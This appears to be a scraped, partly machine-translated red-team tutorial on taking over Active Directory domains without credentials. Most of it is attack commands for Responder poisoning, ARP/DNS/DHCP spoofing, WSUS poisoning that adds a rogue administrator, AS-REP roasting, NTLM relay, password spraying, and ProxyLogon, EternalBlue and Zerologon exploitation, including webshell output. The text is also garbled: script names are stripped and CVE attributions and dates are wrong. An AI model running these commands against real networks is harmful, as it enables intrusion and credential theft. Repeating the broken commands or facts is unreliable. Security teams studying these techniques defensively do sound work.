Pwning the Domain: Credentialess/Username

Pwning the Domain: Credentialess/Username

Reconnaissance 侦察

Reconnaissance is an important step when engaging in a red teaming/penetration testing assessment. It may provide you the information you need later on while it may not seem so important in the meantime, For example you may stumble upon a username which you can make use of when brute forcing or using it in an ASREPRoast attack.


DHCP(Dynamic Host Configuration Protocol) is a protocol that we can use in networks to dynamically assign IP addresses to hosts. DHCP has four steps till finally assigning an IP address the second step being “DHCP offer”. It is sent after a client sends a “DHCP discover” packet to find DHCP servers and request IP addresses from them. DHCP offer packet contains a lot information which can be of use to us:
DHCP(动态主机配置协议)是一种我们可以在网络中使用的协议,用于动态地为主机分配IP地址。DHCP有四个步骤,直到最后分配一个IP地址,第二步是“DHCP提供”。它是在客户端发送“DHCP发现”数据包以查找DHCP服务器并向其请求IP地址后发送的。DHCP offer包包含了很多对我们有用的信息:

  • Name servers 名称服务器
  • Domain names 域名

Name servers and domain names can be set by DHCP hence the information.

To retrieve this information you can either sniff it in wireshark or use a nmap script:

nmap --script broadcast-dhcp-discover


AD DS relies on DNS SRV RR which stands for Service Location Resource records to find LDAP/KDC/global catalog/.. Servers. Using nslookup we can query these records:
AD DS依赖于DNS SRV RR(代表服务位置资源记录)来查找LDAP/KDC/全局目录/.服务器.使用nslookup我们可以查询这些记录:

  • LDAP: nslookup -type=srv _ldap._tcp.dc._msdcs.<domain name> 
    LDAP:nslookup -type=srv _ldap._ tcp.dc._ msdcs.
  • KDC: nslookup -type=srv _kerberos._tcp.<domain name>
    KDC:nslookup -type=srv _keroscopy._ TCP.
  • Global catalog: nslookup -type=srv _ldap._tcp.<domain name>
    全局编录:nslookup -type=srv _ldap._ TCP.


Like DNS, NBT-NS is also used to translate names to IP addresses. It’s used as a fallback by default when DNS is not working.

  • Get names: nbtscan -r <net id>/<mask>
    获取名称:nbtscan -r/
  • Get the name for a single IP: nmblookup -A <IP>
    获取单个IP的名称:nmblookup -A

Responder analyze mode 应答者分析模式

Responder is a tool red teamers often use specially at the start of the assessment. We cannot explain it any better than the author itself: “Responder is an LLMNR, NBT-NS and MDNS poisoner.”

Responder has a mode called ‘analyze mode’ which some may not be familiar with, in analyze mode it looks passively for the below information:

  • DC
  • SQL server
  • Workstation 工作站
  • FQDNs
  • Windows versions Windows版本
  • ..

To use this mode:

responder -I "<net interface>" -A


LDAP is a protocol used within the AD realm to talk to directory services and exchange information. Many information can be obtained by leveraging LDAP:

  • Users 用户
  • Machines 机器
  • Groups 
  • GPOs
  • ..

To enumerate using LDAP you can use ldapsearch or similar tools. Do note that when you have no credentials, anonymous binding must be enabled to query it or else you’ll see the error “bind must be completed”.
要使用LDAP进行枚举,可以使用ldapsearch或类似工具。请注意,当您没有凭据时,必须启用匿名绑定才能查询它,否则您将看到错误“bind must be completed”。

A basic query: ldapsearch -x -h <ip> -s base
一个基本查询:ldapsearch -x -h-s base


Many things within windows talk to each other using RPC. RPC is a protocol which enables a program to request a service from another program on another system or even locally also known as inter-process communication. To talk to RPC when you have no credential, you must have null session enabled in a SMB server to talk to RPC using SMB named pipes. From there you can enumerate:

  • Users 用户
  • Groups 
  • Policies 政策
  • ..

For interacting with RPC you can use a tool called rpcclient. To use it in unauthenticated mode:

rpcclient -U “” -N <ip>

To query: 要查询:

  • Users : enumdomusers 用户:mandomusers
  • User details: queryuser <rid>
  • Groups: enumdomgroups 组:组
  • Group details: querygroup <rid>
  • Domains: enum 域名:enum
  • All available shares: netshareenumall

SMB null session SMB空会话

Guest access or also known as null session in SMB, is a feature that allows you to use SMB without credentials. To find a SMB with null session enabled is a valuable finding in red team assessment because you don’t really know where it may get you from there! You might be able to upload files that when opened authenticate to your machine therefore getting the victim’s NetNTLM hash. To enumerate SMB hosts you can use CrackMapExec or its successor NetExec.

Finding usernames 查找用户名

Finding usernames is a crucial step in red team assessment which opens the way for more attack vectors.


When you have a victim SMB server with null session enabled, it can be used to find users using Impacket’s lookupsid which bruteforces SIDs.


If you have access to a SMB server with null session enabled, you can talk to RPC and enumerate users from it using rpcclient and the command enomdumusers and get a specific user’s details using queryuser <rid> as explained above.


LDAP can also be used to find usernames with the same command as specified above in reconnaissance step: ldapsearch -x -h <ip> -s base
LDAP也可以用于查找用户名,使用的命令与上面在侦察步骤中指定的命令相同:ldapsearch -x -h-s base


Kerberos is the three-headed dog guardian of the Windows realm. The pre-authentication step when authentication users to AD can be used to also bruteforce and enumerate users. The tool that can be used for this is kerbrute.

kerbrute userenum -d <domain name> usernames.txt

Man in the middle attack is always the worthy attack to try if we want to PWN the domain controller. There are several protocol and windows mechanism that we can target to perform these attack. we will look at each of these.

What is LLMNR/NBTNS/MDNS Poisoning

LLMNR : LLMNR (local link multicast name resolution) its a protocol that allow the name resolution of the host without the DNS server . it uses multicast packet on UDP port 5355 by asking all listing network interfaces to provide the hostname-to-IP Conversation.
LLMNR(Local Link Multicast Name Resolution,本地链路多播名称解析)是一种允许主机在没有DNS服务器的情况下进行名称解析的协议。它通过要求所有列出的网络接口提供主机名到IP对话,在UDP端口5355上使用多播数据包。

NBT-NS : NetBIOS name service (NBT-NS) is a Windows protocol that is used to translate NetBIOS names to IP addresses on a local network. It works on UDP 137 and is predecessor of LLMNR.
NBT-NS:NetBIOS名称服务(NBT-NS)是一种Windows协议,用于将NetBIOS名称转换为本地网络上的IP地址。它工作在UDP 137上,是LLMNR的前身。

MDNS : Multicast DNS also help in name resolution . unlike NBT-NS it doesn’t query name server, instead I sends multicast packet to all the client in the network , so when a connection between sender and recipient is made, all participants are informed of the connection between the name and IP and can make corresponding entry in MDNS cache.

Let’s say a Victim wants to connect to a SMB share on the network drive called \\Hadess if that share doesn’t exits the the Network server will replies that he can’t connect to you to \\Hadess . so now the victim which is trying to connect to share, will send a multicast request to entire networking using LLMNR asking if any user knows the route address to that particular drive.

Pwning the Domain: Credentialess/UsernamePwning the Domain: Credentialess/Username

Now adversary can take advantage of that and can send rouge replies to above multicast request that they know the identity of the shared drive \\Hadess but in turn victim have to return the NTLM hash. This means that attacker can poisoning the network with fake address but still get the NTLM hash of the victim.

Pwning the Domain: Credentialess/Username

Pwning the Domain: Credentialess/Username

How to Perform LLMNR/NBTNS poisoning via SMB

so performing this attack will require us to set up Responder , which will help us to send the rouge replies to the Vitim. Just run it on the network interface you want your rouge replies to go.

responder -I eth0
Pwning the Domain: Credentialess/Username

This will enable The LLMNR and will respond to LLMNR requests. if any user by mistake tries to access the drive or share that are not available , can lead to exfiltration of NTLM packages.

Pwning the Domain: Credentialess/Username

Pwning the Domain: Credentialess/Username

This would Essentially provide us with NTLM hashes of victim , which we can crack it with help of Hashcat or can follow up for Pass the Hash attacks.
这将从本质上为我们提供受害者的NTLM散列,我们可以在Hashcat的帮助下破解它,或者可以跟进Pass the Hash攻击。

What is ARP Spoofing (Address Resolution Protocol)

ARP acronym stands for Address Resolution Protocol, and as the name suggests it is a protocol that enables network communications between devices. ARP used to translate Internet Protocol (IP) addresses to a “fixed physical machine address”, also known as a Media Access Control (MAC) address, in a local-area network. Usually, ARP used within devices to communicate the router that enables those devices to connect to the Internet.

How Does the attack works ?

In the ARP spoofing attack , the attacker can intercept the communication between network devices.

The attack works as follows:

The network must be accessible to the attacker. They search the network for the IP addresses of a minimum of two devices, assuming these are a router and a workstation. Here is the output of ARP table before the attack.

arp -a
Pwning the Domain: Credentialess/Username

The attacker sends out fake ARP answers by using a spoofing tool like Arpspoof or bettercap. It is conducted by opening two terminal in kali and send the command like so :

arpspoof -i wlan0 -t # targeting router

Pwning the Domain: Credentialess/Username

arpspoof -i wlan0 -t # targeting victim

Pwning the Domain: Credentialess/UsernamePwning the Domain: Credentialess/Username

The falsified answers claim that the attacker’s MAC address is the correct MAC address for both IP addresses, which belong to the workstation and router. By doing this, the workstation and router are tricked into connecting to the attacker’s computer rather than to one another.

From so on, rather of speaking with each other directly, the two devices communicate with the attacker by updating their entries in the ARP cache.

Now, the attacker is surreptitiously interfering with every conversation. we can check it via ARP table again :

Pwning the Domain: Credentialess/Username

So , If the data is not being encrypted or the protocol is not using SSL/TLS and authentication attempt is made it can provide the access to sensitive data or NTLM hashes , which can latter be crack to

provide access to DC. Attacker can see the data packets flowing out of his computer in wireshark.

Also an attacker need to forward the incoming packets out form his computer , it can be done like so :

echo 1 > /proc/sys/net/ipv4/ip_forward

Pwning the Domain: Credentialess/Username

What is DNS poisoning 什么是DNS中毒

During a DNS poisoning attack, An attacker intercept the DNS request and start sending spoofed responses. This is possible because the most of the DNS request going in an out of AD environment are in plaintext, making it easy to intercept after we have become Man in the Middle via ARP Poisoning.

How Does this attack works ?

Since we had done ARP spoofing via arpspoof we can also utilize the Bettercap or Ettercap to do the same With help of these commands , I will use Bettercap to demonstrate that.

sudo bettercap -iface wlan0

net.probe on

set arp.spoof.targets <target_IP>

arp.spoof on

net.sniff on

These command will start ARP spoof and will capture the data traffics. But Now since we want to conduct DNS Spoofing / Hijacking, we will follow up more like this :

set [domains separated by commas here] set dns.spoof.address [IP address where traffic will go]

dns.spoof on

We can also use the file for which specific domain should undergo DNS spoofing or if we wanted to spoof all DNS request.

#spoof the Host specified in file

set dns.spoof.hosts [path to hosts file]

#spoof all DNS traffic

set dns.spoof.all true

What is DHCP Poisoning ?

DHCP spoofing is type of MITM attack in which an attacker can distribute network configuration in order to be able to read network traffic. This case is usually achieved by replying to DHCP request faster than original DHCP server.

Windows machines provide several Custom DHCP flags like NetBIOSWINSWPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.

From the above Described flags, the DHCP options 252 Provides a way to send out WPAD configuration out to client who is requesting network setting. If An attacker able to answer broadcast DHCP queries faster than the legit DHCP server can inject any WPAD network setting on the requesting client. WPAD is just like a proxy setting given so that , if any request client is making out it first passes through that proxy.

How Does the attack works ?

First attacker need to reply to DHCP request faster than legit DHCP server , this can be achieve via DHCP starvation attack.

Now , the rouge DHCP Server of the attacker sends out ACK response to request with malicious WPAD network setting for a very short lease time (eg: 30 secs)
现在,攻击者的Rouge DHCP服务器发送ACK响应请求,恶意WPAD网络设置为非常短的租赁时间(例如:30秒)

Now Wait for the lease to get expired and it it ask the new lease from the legit DHCP server only.

The Injected WPAD network setting will be there in client memory until it reboots.

Now the infected client will try to get wpad.dat file from the malicious rouge WPAD server to get the proxy address
现在,受感染的客户端将尝试从恶意rouge WPAD服务器获取wpad.dat文件,以获取代理地址

Now our malicious rouge WPAD server will force the client to first authenticate, which means we would most likely get an NTLM hash.
现在,我们的恶意Rouge WPAD服务器将强制客户端首先进行身份验证,这意味着我们很可能会得到一个NTLM哈希。

We can utilize the Responder to help us out conducting this attacks. The attack can be started with – d/–DHCP (WPAD injection) argument. By default , a rouge WPAD server will be injection in the configuration.
我们可以利用响应器来帮助我们进行这些攻击。攻击可以使用- d/-DHCP(WPAD注入)参数启动。默认情况下,一个rouge WPAD服务器将被注入到配置中。


One additional arguments and options should be sued when doing DHCP poisoning with -d/–DHCP argument. These are

option to start the WPAD rouge server so that fake wpad.dat file can be served to requesting clients (WPAD spoofing attack)
启动WPAD rouge服务器的选项,以便可以将伪造的wpad.dat文件提供给请求客户端(WPAD欺骗攻击)

Here is whole command how it works :

responder --interface "eth0" --DHCP --wpad

Pwning the Domain: Credentialess/Username

What is WSUS Poisoning 什么是SUS中毒

WSUS (Windows Server update services) is a management for windows system updates in organization network. So when setting up the WSUS for clients workstation by default WSUS doesn’t
SUS(Windows Server Update Services)是一种在组织网络中管理Windows系统更新的服务。因此,在为客户端工作站设置WSUS时,默认情况下,

use HTTPS or any secure layer of SSL/TLS.

During the update of windows system via WSUS , clients are redirected to the Microsoft signed executable files which are run for the update the system. These binary uses an handler called CommandLineInstallation that specifies the additional parameters to pass the binary during the update installation.

Pwning the Domain: Credentialess/Username

we can use windows registry to find out if the organization windows Update server the organization using is is HTTP or HTTPS.
我们可以使用Windows注册表来确定组织使用的组织Windows Update服务器是HTTP还是HTTPS。

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v wuserver

How Does this attack works ?

First perform MITM via ARP spoofing between client and update server.

Redirect the traffic from client to malicious WSUS server.

keep malicious WSUS server ready that will help us in sending the evil update to client .

We can use the pywsus to start the Evil WSUS server that will run an our choice binary and commands to run. eg :
我们可以使用pywsus启动Evil WSUS服务器,它将运行我们选择的二进制文件和命令。例如:

python3 --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser somepassword /add && net localgroup Administrators testuser /add"'

Here we use Psexec Because it an windows binary and WSUS binary that are beign fetched should be microsoft sign only. But we use PSExec to follow up the concept of LOLBINS.

Now once WSUS is ready, we can start MITM attack for that purpose we can use bettercap to easy the process use the following bettercap caplets to get it running
现在,一旦SUS准备就绪,我们就可以启动MITM攻击,为此,我们可以使用bettercap来简化流程,使用以下bettercap caplet来运行它

  • quick recon of the network net.probe on
  • set the ARP spoofing
set arp.spoof.targets $client_ip

set arp.spoof.internal false

set arp.spoof.fullduplex false
  • reroute traffic aimed at the WSUS server set any.proxy.iface $interface
    重新路由以WSUS服务器为目标的通信设置any.proxy.iface $interface
set any.proxy.protocol TCP

set any.proxy.src_address $WSUS_server_ip set any.proxy.src_port 8530

set any.proxy.dst_address $attacker_ip set any.proxy.dst_port 8530

Settings > Update & Security > Windows
  • control logging and verbosity events.ignore endpoint events.ignore net.sniff
  • start the modules 启动模块
any.proxy on

arp.spoof on

net.sniff on

bettercap --iface $interface --caplet wsus_spoofing.cap

Now when windows update are trigger (by default every 22 hour) we will get an command execution. we can also trigger an update by navigating over to :
Pwning the Domain: Credentialess/Username

Update > Check for updates

What is ASREPRoasting 什么是ASREPRoasting

It is an Active directory attack where the Kerberos authentication process is targeted. It specifically targets user accounts that are not using Kerberos pre-authentication. That means that anyone can send an AS_REQ (request) to the DC on behalf of any of those users, and receive an AS_REP (response) message. This message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
这是一种Active Directory攻击,其目标是IPSec身份验证过程。它专门针对未使用防毒墙网络版预身份验证的用户帐户。这意味着任何人都可以代表这些用户向DC发送AS_REQ(请求),并接收AS_REP(响应)消息。此消息包含一个用原始用户密钥加密的数据块,该密钥源自其密码。然后,通过使用此消息,可以离线破解用户密码。

How Does this attack works ?

This attack doesn’t need any Domain Account , Just a connection to DC . But if we have an Domain account we can leverage the LDAP to find us the users accounts that have the flag (DONT_REQ_PREAUTH) . But we can also brute-force the usernames via wordlist.

Enumerating vulnerable users (need domain credentials)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

Request AS_REP Message via Impacket

#Try all the usernames in usernames.txt
python jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast

#Use domain creds to extract targets and target them

python jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat – outputfile hashes.asreproast
python jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat- outputfile hashes.asreproast

Using Rubeus for exploiting Windows Environment

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username] Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (

ultimately we can use the john the reaper or Hashcat to crack those hashes:
最终,我们可以使用John the Reaper或Hashcat来破解这些哈希值:

john --wordlist=passwords_kerb.txt hashes.asreproast hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Net-NTLM relay Attacks Net-NTLM中继攻击

NTLMv1/v2 or Net-NTLMv1/v2 hashes when captured by coercing the authentication can be relayed back to other victims available in network. The captured Hashes can be from any protocol or via placing yourself as MITM. With this information, we can easily imagine the following scenario: An attacker manages to be in a man-in-the-middle position between a client and a server, and simply relays information from one to the other.
NTLMv 1/v2或Net-NTLMv 1/v2散列在通过强制身份验证捕获时可以中继回网络中可用的其他受害者。捕获的哈希值可以来自任何协议,也可以通过将您自己设置为MITM。有了这些信息,我们可以很容易地想象以下场景:攻击者设法处于客户端和服务器之间的中间人位置,并简单地将信息从一个中继到另一个。

The man-in-the-middle position means that from the client’s point of view, the attacker’s machine is the server to which he wants to authenticate, and from the server’s point of view, the attacker is a client like any other who wants to authenticate.

Pwning the Domain: Credentialess/Username

The NTLM authentication message for relaying can be embedded in any protocol like SMB,HTTP,MSSQL,SMTP , IMAP. The NTLM authentication protocols are “application protocol-independent”. It means one can relay LM or NTLM authentication messages over a certain protocol, say HTTP, over another, say SMB. That is called cross-protocols LM/NTLM relay.

Here we will be looking at two NET-NTLM relay attacks:



SMB Relay Attack SMB中继攻击

Here we use SMB protocol for relaying the Hashes . For this Relay attack to work , there are few requirement.

SMB signing must be disabled on the target.

Relayed user credentials must be admin on machine , so that we get got execution.

We would need Responder and Imapcket’s . We would need to do some configuration changes in Responder config file . Such that SMB or HTTP listing mode are OFF , because we would be using NTLMRelayx to open those ports for relaying the hashes .
我们需要Responder和Imaptek NTLMRealyx.py我们需要在Responder配置文件中做一些配置更改。SMB或HTTP列表模式为OFF,因为我们将使用NTLMRelayx打开这些端口以中继哈希。

Pwning the Domain: Credentialess/Username

Now run the NTLMRelayx on the other terminal python -tf targets.txt –
现在在另一个终端python上运行NTLMRelayx targets.txt-
Pwning the Domain: Credentialess/Username


Pwning the Domain: Credentialess/Username

Here the targets.txt file should be all the clients in environment which has SMB Singing disabled , so that we can relay the hashes. By-default NTLMRealayx would be performing DC sync and would be dumping the SAM databases of the client so that we can get access.
这里的targets.txt文件应该是禁用SMB Singing的环境中的所有客户端,以便我们可以中继散列。默认情况下,NTLMRealayx将执行DC同步,并将转储客户端的SAM数据库,以便我们可以访问。

MS SQL Relay Attack MS SQL中继攻击

The MSSQL databases use the MS-TDS protocol over RPC. The RPC does not provide global relay protection or encryption. Depending on the configuration of the MSSQL client and server, the communication can be encrypted or plaintext. With encryption, another feature called Extended Protection is available since Windows 2018 R2 and Windows 7. Service Binding and Channel Binding can be enforced and protect against relaying attacks but this feature is disabled by default.
MSSQL数据库使用基于RPC的MS-TDS协议。RPC不提供全局中继保护或加密。根据MSSQL客户端和服务器的配置,通信可以是加密的,也可以是明文的。通过加密,自Windows 2018 R2和Windows 7以来,还提供了另一项名为扩展保护的功能。可以强制执行Service Binding和AccesselBinding并防止中继攻击,但默认情况下禁用此功能。

If Extended Protection is disabled, one can relay to MSSQL . To Run This attack we would need Responder and NTLMRelayx . in Responder’s config file try to disable The MSSQL flag , so that it can be used efficiently by NTLMRelayx .

Pwning the Domain: Credentialess/Username
Pwning the Domain: Credentialess/Username

As you can see we got access to MSSQL database, now we can further abuse the database with stored procedures xp_fileexist and xp_dirtree to get Command Execution.


AS-REP Roasting is an attack technique targeting weaknesses in the Kerberos authentication protocol used in Active Directory environments. This attack allows an attacker to request encrypted Kerberos tickets for user accounts that do not require pre-authentication. These encrypted tickets can then be offline brute-forced to obtain the user’s password hash. Rubeus.exe, a powerful tool for AD exploitation, includes a command specifically designed for executing AS-REP Roasting attacks.
AS-REP Roasting是一种针对Active Directory环境中使用的IPSec身份验证协议中的弱点的攻击技术。此攻击允许攻击者请求不需要预身份验证的用户帐户的加密身份验证票证。然后,这些加密的票证可以被离线暴力破解以获得用户的密码哈希。 Rubeus.exe 是一个强大的AD攻击工具,包含一个专门用于执行AS-REP Roasting攻击的命令。

Rubeus.exe asreproast

This command initiates the AS-REP Roasting attack. By default, asreproast will target all users in the current domain who have the “Do not require Kerberos preauthentication” flag set, making them vulnerable to this attack.
此命令启动AS-REP Roasting攻击。默认情况下, asreproast 将针对当前域中设置了“不需要身份验证预验证”标志的所有用户,使他们容易受到此攻击。

Rubeus.exe asreproast / /user:targetuser

After executing the command, Rubeus.exe will output the obtained ticket data, including the encrypted Kerberos tickets. This data can then be used for offline brute-forcing to obtain the user’s password hash.
Rubeus.exe 执行完命令后,会输出获取的票证数据,包括加密后的客票。然后,这些数据可以用于离线暴力破解,以获取用户的密码哈希。

Once you have the encrypted tickets, you can use tools like Hashcat or John the Ripper to perform offline brute-force attacks against them to obtain the user’s password hash.
一旦你有了加密的票证,你就可以使用Hashcat或John the Ripper等工具对它们进行离线暴力攻击,以获取用户的密码哈希。

Bruteforcing 暴力

Password spraying is a technique used by attackers to gain unauthorized access to user accounts in an Active Directory domain by trying a few commonly used passwords against many accounts. Unlike traditional brute-force attacks, where a large number of passwords are tried against a single account, password spraying involves trying a small number of passwords against many accounts to avoid detection by account lockout policies. Here’s how you can perform password spraying in an Active Directory domain using various tools and commands:
密码喷射是攻击者使用的一种技术,通过对多个帐户尝试几个常用密码来获得对Active Directory域中用户帐户的未经授权访问。与传统的暴力攻击不同,在暴力攻击中,针对单个帐户尝试了大量密码,密码喷射涉及针对许多帐户尝试少量密码,以避免帐户锁定策略的检测。以下是如何使用各种工具和命令在Active Directory域中执行密码喷洒:

Invoke Password Spraying with Rubeus:

Rubeus.exe brute /password:Password123! /user:Administrator / /

Invoke Password Spraying with CrackMapExec:

crackmapexec smb -u usernames.txt -p Password123!

Invoke Password Spraying with Metasploit:

use auxiliary/scanner/smb/smb_login
set SMBUserFile usernames.txt
set SMBPass Password123!

Invoke Password Spraying with Hydra:

hydra -L usernames.txt -p Password123! smb://

Vulnerabilities 漏洞


The ProxyShell vulnerability is a critical security issue affecting Microsoft Exchange servers. It comprises three separate vulnerabilities: ProxyShell (CVE-2021-34473), ProxyLogon (CVE-2021-34474), and ProxyOracle (CVE-2021-34475). These vulnerabilities allow attackers to bypass authentication mechanisms and gain unauthorized access to Exchange servers, potentially leading to complete compromise of the server and the underlying Active Directory domain.
ProxyShell漏洞是影响Microsoft Exchange服务器的重要安全问题。它包含三个独立的漏洞:ProxyShell(CVE-2021-34473)、ProxyShell(CVE-2021-34474)和ProxyOracle(CVE-2021-34475)。这些漏洞允许攻击者绕过身份验证机制并获得对Exchange服务器的未经授权的访问,可能导致服务器和底层Active Directory域的完全危害。

Attackers exploit the ProxyShell vulnerability by sending crafted HTTP requests to the Exchange server. By chaining the three vulnerabilities, they can execute arbitrary commands on the server, leading to potential compromise.

git clone
cd ProxyShell
virtualenv -p $(which python3) venv
source venv/bin/activate
pip3 install pypsrp
cp venv/lib/*/site-packages/pypsrp/
python3 <target-exchange-server-ip> <email>

ProxyLogon 普罗克西汀

The ProxyLogon vulnerability, tracked as CVE-2021-26855, is a critical security flaw affecting on-premises Microsoft Exchange servers. Exploitation of this vulnerability can lead to unauthorized access to email accounts and potentially complete compromise of the Exchange server and the underlying Active Directory domain. The ProxyLogon vulnerability is part of the larger set of vulnerabilities known as ProxyShell.
代理漏洞(跟踪为CVE-2021-26855)是影响内部部署Microsoft Exchange服务器的关键安全漏洞。利用此漏洞可能导致对电子邮件帐户的未经授权访问,并可能完全危害Exchange服务器和底层Active Directory域。ProxyShell漏洞是称为ProxyShell的更大漏洞集的一部分。

Here’s an overview of the ProxyLogon vulnerability and steps to mitigate it:

  • ProxyLogon allows attackers to execute arbitrary code on vulnerable Exchange servers without authentication, leading to unauthorized access.
  • Attackers can exploit this vulnerability by sending crafted HTTP requests to the Exchange server, enabling them to execute arbitrary commands and potentially take control of the server.

C:\>python mail.evil.corp [email protected]
Attacking target mail.evil.corp
Got DN: /o=EVIL CORP/ou=first administrative group/cn=Recipients/cn=Administrator
Got SID: S-1-5-21-175943541-xxxxxxxxxx-3152120021-500
Got session id: a99eda32-xxxx-xxxx-825b-5f1c4a6080e7
Got canary: rOWUk7lmAUC2-5HIlQ4EpGq1rPu959xxxxxxxxxx_xxxxxxx_xxx_a-KJ5WR-9j95yu-JOv3dFY.
=========== It means good to go!!!====
Got OAB id: 2f3d4600-xxxx-xxxx-xxxx-b4a4c1d3fb58
(+) Webshell drop at https://mail.evil.corp/owa/auth/evilcorp.aspx
(+) Code: curl -ik https://mail.evil.corp/owa/auth/evilcorp.aspx -d 'exec_code=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())'
CMD: whoami
nt authority\system


The EternalBlue vulnerability, also known as CVE-2017-0144, is a critical security flaw that affects the SMBv1 protocol implementation in various versions of Microsoft Windows operating systems. This vulnerability was famously exploited by the WannaCry ransomware attack in 2017. EternalBlue allows remote attackers to execute arbitrary code on vulnerable systems without authentication, potentially leading to complete compromise of the system and the underlying Active Directory domain.
EternalBlue漏洞,也称为CVE-2017-0144,是一个严重的安全缺陷,影响各种版本的Microsoft Windows操作系统中的SMBv 1协议实现。这个漏洞在2017年被WannaCry勒索软件攻击所利用。EternalBlue允许远程攻击者在没有身份验证的情况下在易受攻击的系统上执行任意代码,可能导致系统和底层Active Directory域的完全危害。

  • EternalBlue exploits a vulnerability in the SMBv1 protocol (specifically the Microsoft Server Message Block 1.0 file sharing protocol) used for file and printer sharing on Windows systems.
    EternalBlue利用SMBv 1协议(特别是Microsoft Server Message Block 1.0文件共享协议)中的漏洞,该协议用于Windows系统上的文件和打印机共享。
  • Attackers can exploit this vulnerability by sending crafted SMB packets to vulnerable systems, enabling them to execute arbitrary code and propagate malware across networks.


The SMBGhost vulnerability, also known as CVE-2020-0796, is a critical security flaw that affects the Server Message Block (SMB) protocol version 3.1.1 in Microsoft Windows 10 and Windows Server versions 1903 and 1909. Exploitation of this vulnerability could allow remote attackers to execute arbitrary code on vulnerable systems, potentially leading to complete compromise of the system and the underlying Active Directory domain.
SMBGhost漏洞,也称为CVE-2020-0796,是一个严重的安全缺陷,影响Microsoft Windows 10和Windows Server版本1903和1909中的服务器消息块(SMB)协议版本3.1.1。利用此漏洞可使远程攻击者在易受攻击的系统上执行任意代码,从而可能导致系统和底层Active Directory域的完全危害。

  • SMBGhost exploits a vulnerability in the way SMBv3 handles certain requests, specifically related to compression, leading to a buffer overflow condition.
    SMBGhost利用SMBv 3处理特定请求(特别是与压缩相关的请求)的方式中的漏洞,导致缓冲区溢出情况。
  • Attackers can exploit this vulnerability by sending crafted packets to vulnerable systems, allowing them to execute arbitrary code and gain unauthorized access.
java -jar EquationExploit-1.0-SNAPSHOT-jar-with-dependencies.jar
  1. Options 选项:
    • Select Exploit: Choose between EternalBlue and DoublePulsar. The order matters.
    • Batch Exploitation: Perform exploitation on a list of target IP addresses provided in ip.txt.
      Batch Exploitation:对 ip.txt 中提供的目标IP地址列表执行攻击。
    • Specify Payload DLL Name: Inject a specified DLL into the target process. The DLL architecture should match the target system (x86 or x64). Some sample DLLs are provided in the dlls folder.
      指定有效负载DLL名称:将指定的DLL注入目标进程。DLL体系结构应与目标系统(x86或x64)匹配。 dlls 文件夹中提供了一些示例DLL。
  2. Payload DLLs 有效负载DLL:
    • x64reboot.dll and x86reboot.dll: Restart the computer immediately.
      x64reboot.dll 和 x86reboot.dll :立即重新启动计算机。
    • x64createSysUser.dll and x86createSysUser.dll: Create a user account (requires administrator privileges).
      x64createSysUser.dll 和 x86createSysUser.dll :创建用户帐户(需要管理员权限)。

To generate custom DLL payloads, you can use tools like msfvenom. For example, to generate a DLL payload that opens the calculator:
要生成自定义DLL负载,您可以使用 msfvenom 等工具。例如,要生成打开计算器的DLL有效负载:

msfvenom –platform Windows -p windows/x64/exec -f dll -o /tmp/exec.dll CMD=calc

Zerologon 泽罗洛贡

The Zerologon vulnerability, tracked as CVE-2020-1472, is a critical security flaw affecting the Netlogon Remote Protocol (MS-NRPC) in Microsoft Windows Server Active Directory domains. Exploitation of this vulnerability can allow attackers to gain unauthorized access to domain controllers and potentially take control of the entire Active Directory domain. Zerologon was discovered by researchers from Secura BV and publicly disclosed in August 2020.
Zerologon漏洞(跟踪为CVE-2020-1472)是影响Microsoft Windows Server Active Directory域中Netlogon远程协议(MS-NRPC)的关键安全漏洞。利用此漏洞可允许攻击者获得对域控制器的未经授权访问,并可能控制整个Active Directory域。Zerologon由Secura BV的研究人员发现,并于2020年8月公开披露。

  • Zerologon exploits a flaw in the cryptographic authentication mechanism used by the Netlogon protocol, allowing attackers to bypass authentication and establish a vulnerable Netlogon secure channel connection.
  • Attackers can exploit this vulnerability to impersonate a domain controller and perform unauthorized actions, such as changing passwords of domain accounts, creating new accounts with domain admin privileges, and accessing sensitive data stored in Active Directory.
    攻击者可以利用此漏洞来模拟域控制器并执行未经授权的操作,例如更改域帐户的密码、创建具有域管理员权限的新帐户以及访问存储在Active Directory中的敏感数据。

Use the provided Python script to exploit the ZeroLogon vulnerability:


Replace DC_NETBIOS_NAME with the NetBIOS name of the domain controller and DC_IP_ADDR with its IP address.
将 DC_NETBIOS_NAME 替换为域控制器的NetBIOS名称,将 DC_IP_ADDR 替换为其IP地址。

  1. Extract NT Hash:Once successful, use from Impacket to extract the NT hash:
    提取NT哈希:成功后,使用Impacket中的 提取NT哈希: -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'

Dump Registry Hives: 转储注册表配置单元:

Use from Impacket to connect to the target DC and dump registry hives:
使用Impacket中的 连接到目标DC并转储注册表配置单元: -hashes NT_HASH 'DOMAIN/username@DC_IP_ADDR' 'reg save HKLM\SYSTEM' -hashes NT_HASH 'DOMAIN/username@DC_IP_ADDR' 'reg save HKLM\SAM' -hashes NT_HASH 'DOMAIN/username@DC_IP_ADDR' 'reg save HKLM\SECURITY'

Use to extract the original NT hash of the machine account:
使用 提取机器帐户的原始NT哈希: -sam -system -security LOCAL

Finally, use the provided script to reinstall the original machine account hash to the domain:


PetitPotam 珀蒂

The PetitPotam vulnerability is a critical security flaw that affects the Microsoft Windows operating system’s NTLM (NT LAN Manager) authentication protocol. This vulnerability, tracked as CVE-2021-36942, can allow attackers to perform a relay attack and compromise the authentication process, potentially leading to unauthorized access to sensitive resources within the Active Directory domain.
